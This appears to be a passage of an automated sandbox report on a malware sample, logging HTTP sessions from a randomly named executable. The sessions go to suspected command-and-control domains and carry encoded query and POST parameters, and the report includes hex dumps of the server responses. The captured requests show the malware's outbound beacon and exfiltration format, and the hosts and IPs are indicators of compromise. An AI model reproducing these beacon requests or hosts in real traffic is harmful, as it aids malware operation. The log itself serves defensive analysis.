                                          Data Ascii: 4b34ht=aTgNlw6AlVm3ivvIvYY8dpeR2LBomJZCIBSfJdgdCy8s3Tu5O4e1+c9eY7Qp3OMb0hNzsD4vRdAmc271AhSYe+leznG2O/HCMNPalo2jw8m5y18aaeZvxRXOezn3CjtqoI+5FsGIn2c2teukBuSMiYlT7Vq+JwzZ7nIhO/ERpU3Tvf3L6IwQE/MkO1EMp87wWQA8BTRxdJxI0Mbr3uJ+iuaGorEzrf2sA+8GW4QBTpNNj1NE+cDvkmSAnTIi3KrqUMF9fUqrHEoENTsY6tWfc2+bBaJMKeZalc8QKLgBTR7ucyTGoCcuBkDhY4JLN+3jChb0+QRQcsi5acZtbm9Sh4sAvDevyyAIGHeCQvH8yRV1CNvKxY3OgVIvC8Steds2Efp3UnqA5Et4qa++IDHxVjQ5JvdXGvc138hVCPbsddeHSNwXXCu6B43QP3wWet5qDcy/Lb8qglJz8RAMzxJuxLC0hHgrc2eC+VsMYiP8NHeRghtYt0OnpKjJcz3EAGNJ4fd9rhjE17saFh4xCHCtUjrjWcTTXRF4AdJJazG3WioTN2ijkVffOXQfl3tfVHNQDtEuPu+l2wwxFhNLcaST+fUuQTggkajAbuaqDUphJdPNwV21QHQ030WYK6uUuPlofVkCD/zCtJlbcfrqAIFf8XRw4DR4lzPTsSI/WVy0vI7tGyMYAwuE5AL7ARodKlPrIeb3khtsY3TgKkBL0bf2XVAQI4fhrITUQqJhb+EEc0bwHxWH9YCytDjn9ZlEsDdXY17WbcJf1ksVP8rwqy2hgOawiro4PjGfuqMZHtrFIRkl7+bs+nm4MNFT7zQ6H8GmOt1dp8KxyFLBG5ibx+5rDhjWdmAsh7xucZ8uYdgMSZDYJocZgG8qooJYnVD8v9vwjx6a1DSzEnFHloPrc/ihTSiDqifd0EQZEfUeaHkH5B/IVG4Jc6jTyQZ8Sp0sQcmBnUcSgaiQKzOZwoJHrrYRC4QWEh18hr1t+IuLzOvNsv1xc [TRUNCATED]
                                          May 27, 2024 12:43:27.029170990 CEST1236INHTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 891f0020-4b7d-44c7-b130-4fd4745d6a3b
                                          x-runtime: 0.023335
                                          content-length: 19239
                                          connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                          May 27, 2024 12:43:27.029202938 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                          May 27, 2024 12:43:27.029211044 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                          Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                          May 27, 2024 12:43:27.029227018 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                          Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                          May 27, 2024 12:43:27.029246092 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                          Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                          May 27, 2024 12:43:27.029261112 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                          Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                          May 27, 2024 12:43:27.029295921 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                          Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                          May 27, 2024 12:43:27.029311895 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                          Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                          May 27, 2024 12:43:27.029336929 CEST1236INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                          Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                          May 27, 2024 12:43:27.029366016 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                          Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                          May 27, 2024 12:43:27.037026882 CEST672INData Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                          Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.549723216.40.34.41806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:29.047327042 CEST503OUTGET /wouf/?4b34ht=XRItmHXywGWVnqDngINAMvff3IpqjclEV1ySHuRZOTcLzBiyF5+l3MoobodW+p084j4Tu28tOugkX2LbOW2aRLZQ/Vv/K47AM9XykbCYypLB0HUyScM9sRvicmb0LC0c/g==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:29.528601885 CEST1236INHTTP/1.1 200 OK
                                          x-frame-options: SAMEORIGIN
                                          x-xss-protection: 1; mode=block
                                          x-content-type-options: nosniff
                                          x-download-options: noopen
                                          x-permitted-cross-domain-policies: none
                                          referrer-policy: strict-origin-when-cross-origin
                                          content-type: text/html; charset=utf-8
                                          etag: W/"716ddccefe706082230daa01e9261cc7"
                                          cache-control: max-age=0, private, must-revalidate
                                          x-request-id: e8e124a6-3d8c-4af8-8bd6-fa4faf4486b2
                                          x-runtime: 0.003471
                                          transfer-encoding: chunked
                                          connection: close
                                          Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                          Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">
                                          May 27, 2024 12:43:29.528655052 CEST1236INData Raw: 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63
                                          Data Ascii: <img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>botcsllc.com</h1><h2>has expired.</h2><div class='cta'><a class='btn' href='https://w
                                          May 27, 2024 12:43:29.528692007 CEST1236INData Raw: 65 78 70 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d
                                          Data Ascii: expired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofollow" href="https
                                          May 27, 2024 12:43:29.528727055 CEST1236INData Raw: 2d 31 39 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38 2e 35 33 38 34 31 20 2d 36 2e 34 31 37 37 35 2c 2d 36 2e 38 33 38 37 39 20 2d 31
                                          Data Ascii: -19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47
                                          May 27, 2024 12:43:29.528760910 CEST848INData Raw: 2d 37 35 20 31 38 31 74 2d 31 38 31 20 37 35 74 2d 31 38 31 20 2d 37 35 74 2d 37 35 20 2d 31 38 31 74 37 35 20 2d 31 38 31 74 31 38 31 20 2d 37 35 74 31 38 31 20 37 35 74 37 35 20 31 38 31 7a 4d 31 31 36 32 20 36 34 30 71 30 20 2d 31 36 34 20 2d
                                          Data Ascii: -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1162 640q0 -164 -115 -279t-279 -115t-279 115t-115 279t115 279t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -
                                          May 27, 2024 12:43:29.528796911 CEST825INData Raw: 0d 0a 33 32 42 0d 0a 31 32 34 20 33 32 32 74 33 32 32 20 31 32 34 71 38 38 20 35 20 33 31 37 20 35 74 33 31 37 20 2d 35 71 32 30 38 20 2d 31 30 20 33 32 32 20 2d 31 32 34 74 31 32 34 20 2d 33 32 32 71 35 20 2d 38 38 20 35 20 2d 33 31 37 7a 22 20
                                          Data Ascii: 32B124 322t322 124q88 5 317 5t317 -5q208 -10 322 -124t124 -322q5 -88 5 -317z" /></g></svg></a></li></ul></nav></main><footer><nav><ul><li>Copyright &copy; 2024 Hover</li><li><a rel="nofollow" href="https://www.hover.com/tos?source=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.54972431.31.196.16806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:34.702189922 CEST765OUTPOST /k2o4/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.pilatovparts.ru
                                          Origin: http://www.pilatovparts.ru
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.pilatovparts.ru/k2o4/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 6e 51 64 75 56 68 4b 2b 49 34 6d 77 69 4b 62 43 4d 53 55 68 67 38 45 4e 51 75 6d 36 44 66 77 61 50 6f 53 31 55 68 4c 68 72 2f 51 75 6d 6d 54 38 77 61 53 69 32 36 69 67 73 53 66 55 48 57 7a 45 2f 44 74 4c 39 48 75 6c 31 7a 6a 72 32 31 32 52 35 31 46 33 39 39 49 6b 61 51 47 38 32 6e 49 57 43 41 30 38 30 2b 74 53 7a 2f 42 54 77 31 35 47 69 5a 4e 37 62 58 46 50 70 42 34 5a 75 4b 65 45 63 73 4c 77 78 7a 68 39 36 70 4b 74 4f 41 34 69 34 48 58 4d 35 74 45 2f 39 52 55 67 52 4a 6f 72 77 62 4a 51 69 51 74 72 77 2f 76 5a 75 74 45 4b 4f 41 5a 74 6b 35 59 55 45 65 4a 56 33 4d 36 4c 31 5a 63 73 2f 63 59 3d
                                          Data Ascii: 4b34ht=nQduVhK+I4mwiKbCMSUhg8ENQum6DfwaPoS1UhLhr/QummT8waSi26igsSfUHWzE/DtL9Hul1zjr212R51F399IkaQG82nIWCA080+tSz/BTw15GiZN7bXFPpB4ZuKeEcsLwxzh96pKtOA4i4HXM5tE/9RUgRJorwbJQiQtrw/vZutEKOAZtk5YUEeJV3M6L1Zcs/cY=
                                          May 27, 2024 12:43:35.410310984 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 27 May 2024 10:43:35 GMT
                                          Content-Type: text/html; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 49 43 7e e9 fa 81 e5 dc f0 9e 09 ff 36 67 2b c3 31 6e 4c af 0b c0 4d 63 fe f6 cd ca 0c 8c ce 6c 69 78 be 19 e8 dd 7f ff f5 fb c1 a8 1b de 75 8c 95 a9 77 6f 2d f3 6e ed 7a 01 a0 77 9d c0 74 a0 d4 9d 35 0f 96 fa dc bc b5 66 e6 80 fc e0 2c c7 0a 2c c3 1e f8 33 c3 36 75 31 0b c2 73 af dd c0 4f 01 70 5c cb 99 9b 1f a1 54 60 05 b6 f9 f6 9f ff c7 ff fc df fe e7 ff fa cf ff fa e7 ff fb cf ff fb 7f fe ef ff fc af 0e 5c fc 8f 53 e7 da 5f 4f e1 ea bf fe f9 ff fc f3 ff fa e7 ff c0 ab 37 67 b4 [TRUNCATED]
                                          Data Ascii: 6000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvIC~6g+1nLMclixuwo-nzwt5f,,36u1sOp\T`\S_O7g?[5lo>oUttfwn^635]cnzg}ovsW($WuB{D(-?8bvg|>ks3W<6?Nc0<sX3fL0te9tTLdIX.Mfgkc>8Q#LWwc9ap\o/(Aax.5kft~27f3s>|`[1pg>b1`ZdcmA8nSxZYdi^B(Hc!6|tX.Ls=0W+0v<sy12Au3&6lvfK*2S#`<U;Os@tn-0U1q;T$^[9dJ4=7+wmE?|Z.svjyCvj_HxSqxUn5e|@>A{%,[-nJMV%b#Q,W"QB+f0w3K#)Byz1H#<EE6+SFyp [TRUNCATED]
                                          May 27, 2024 12:43:35.410362959 CEST1236INData Raw: c8 36 ad f1 04 52 db 4e a6 1a 8d 5a d7 98 74 32 49 87 be c7 c0 0f 0c 30 53 c2 26 8e 84 3d 26 aa c6 f0 13 b1 89 a6 b7 f4 f0 d5 84 44 36 c8 0f 62 8b d9 60 ee 0e 08 57 06 08 9e 0a fc 2e c2 63 f0 b1 19 12 db 74 9d 81 a8 52 d0 8d c9 65 83 5a 24 32 19
                                          Data Ascii: 6RNZt2I0S&=&D6b`W.ctReZ$29#4/i,b/K#(p&(RB<6&m9f$"({PC`~sszdPzuUe;RSQx{3mY>"c{(Kw* _&mz8JV97L
                                          May 27, 2024 12:43:35.410408974 CEST448INData Raw: ca c3 36 d4 d9 e4 d4 fa ce db e4 a2 20 c9 4c 46 b9 7d f3 49 18 e4 76 c9 06 d4 dd c6 78 59 ad fd 0d f1 0c 2b 9e dc 08 8f b0 3f af 01 de b0 1f a2 a6 1f d0 f0 ce f0 e1 a9 8d 6e fb b8 db b3 d9 0c dd 86 7d 10 36 fc 70 86 76 86 09 4f 6f 64 47 e8 9f d9
                                          Data Ascii: 6 LF}IvxY+?n}6pvOodGnqiXgYFu}4t`DGnIj8gFsy}7rOo$@JWg{"h7>:}=Ws+pQ1p4"reomwSGsY
                                          May 27, 2024 12:43:35.410444021 CEST1236INData Raw: 23 a5 b4 7e 96 5c d9 50 86 da 75 65 e1 1c cd 14 5f 65 e9 0c e1 f2 42 31 87 ec 84 43 31 d3 73 0c fb 21 95 5a c8 5a 19 37 e6 64 e3 d9 bd 2e a6 a8 9d 90 df 67 fe ed cd eb 8f 2b 7b 1a 25 9c dd 04 8b c1 88 fb 5a fe 0e 1e 74 e0 81 e3 eb af 30 83 ed e4
                                          Data Ascii: #~\Pue_eB1C1s!ZZ7d.g+{%Zt0y9A:4+WTW_e%YW/"jG+jGGK5I5qgHS&BVUk\q*y0LGR1 iE(.yJ
                                          May 27, 2024 12:43:35.410526037 CEST1236INData Raw: 3c 9b 49 bf db 94 63 33 e9 33 89 85 da 66 c3 2f 58 d3 99 bc ef cf 68 d5 27 99 53 0f 68 d9 97 12 f7 8c d6 3d 13 91 6c 16 7e 9e b4 67 b2 f2 99 28 6a 66 e9 97 52 f6 e4 d6 7e 25 61 ec 16 3f 13 6f 98 ac fe 3c 4b 9e d7 f2 2f 6d cd b3 59 ff 4c 5c 66 b4
                                          Data Ascii: <Ic33f/Xh'Sh=l~g(jfR~%a?o<K/mYL\f=DSCO>GP \]O;8HeV/ .'-5yf==lDu_PDM=@q`gs0!Om9PJ3li/0q/7_S|/
                                          May 27, 2024 12:43:35.410573006 CEST1236INData Raw: c3 20 29 2d 73 05 7d b4 7a b0 cd 00 6c 27 02 86 be 06 94 ac 82 b4 5b 8c a9 56 51 29 cc 03 7c 45 6e fa dd b8 ad de 14 9c c0 36 56 ee c6 21 6f ee 8c 91 99 e9 d7 05 8d 5b 2f 0f 97 aa c1 f4 db 95 01 0b 74 5a 39 17 d2 31 08 1a ea db 56 36 55 6a db d4
                                          Data Ascii: )-s}zl'[VQ)|En6V!o[/tZ91V6UjhR2g\TevK,n*1X~7QZ8zckmc!zd%7cWHp,\Pgf~GU)@**ArNNT=U%CK_|
                                          May 27, 2024 12:43:35.410609007 CEST1236INData Raw: 6c fa 9f 82 ee 4f c6 5e cb 88 ed 51 ec 35 b6 ee da df 5e 63 e9 ac 16 f6 5a 35 83 0e 64 af 1d 8b 3f 95 e0 0f 69 af 65 b8 73 78 7b ed 58 bc a9 82 de c0 5e db bd 2f 2e b1 35 a2 f7 6d b7 30 c7 f6 40 d7 66 e2 3f 00 3a 76 43 a0 15 b2 23 da 6e 6c ed 22
                                          Data Ascii: lO^Q5^cZ5d?iesx{X^/.5m0@f?:vC#nl"J}3rqckI*vnc6A[AM6dpa4f3$V&["koGa.4vpBY`M=\| =3[[y{x
                                          May 27, 2024 12:43:35.410644054 CEST896INData Raw: bc 95 f4 84 ce 66 79 c2 de 64 e5 8b 24 ef a5 53 95 30 8d f2 ed 07 34 d1 7e e1 cd 09 71 9b a5 69 fc 6e a9 4e 37 dd 84 68 1e 48 bd 35 bb 3c 3b 78 fc c2 07 fa de f1 56 99 f9 23 52 70 11 2f 99 15 46 69 49 ea 60 5e f1 62 de ef d2 1c e5 e5 2f d1 cb 66
                                          Data Ascii: fyd$S04~qinN7hH5<;xV#Rp/FiI`^b/ff%)"f2Zic/`H'oQ(ad.4o+"3j_gp";RJK)*iEq'$i:1f'E3Ke<3/tHK!iJi'OC
                                          May 27, 2024 12:43:35.410681009 CEST1236INData Raw: 59 49 24 37 95 41 52 40 01 b6 42 cb 47 c8 55 51 a5 4c 15 d5 81 02 12 11 5e 8a 28 37 c0 43 e0 b3 0c 84 c9 d8 ea 31 08 80 0a 8c 18 13 e1 19 09 72 9a a3 ef e4 77 da bb ef 8b 1c 95 51 7a 86 9d d1 08 9a 35 1b 00 05 32 e9 2d e0 ab a8 00 8a 01 74 d1 10
                                          Data Ascii: YI$7AR@BGUQL^(7C1rwQz52-t&J&8@;QH. x@5`@Zg`$@)* *S-R@J/G?DT@C<#wa\%$m)lF!vOlx`8w
                                          May 27, 2024 12:43:35.410737038 CEST1236INData Raw: 33 b4 36 1a 25 ed 43 cb 08 8d 77 60 e7 48 bd 95 d1 df 18 fd 20 89 68 44 fd 4d 02 d3 43 91 c3 b2 c3 5b 70 49 c4 f1 f0 07 30 99 c7 c3 d1 ed 18 4c 0c 4d f9 81 c2 81 de 56 f9 b1 36 fc 41 b8 05 9b 1a ac 04 e5 cf d0 77 e0 e1 c9 f2 0f a2 06 0c 54 a1 59
                                          Data Ascii: 36%Cw`H hDMC[pI0LMV6AwTYTh,1:D&W9NM4e$#42>n2c"5Tf]@q'Rt``":+>D;qN p~4(qS0S:Fx&0VTw`-<wK$8<`E2
